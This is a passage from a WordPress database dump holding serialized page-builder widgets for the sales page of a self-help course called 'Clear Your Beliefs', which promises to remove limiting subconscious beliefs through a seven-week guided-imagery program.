]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1614, 2047, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62487:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n&nbsp;\n<p><ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p></div>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s 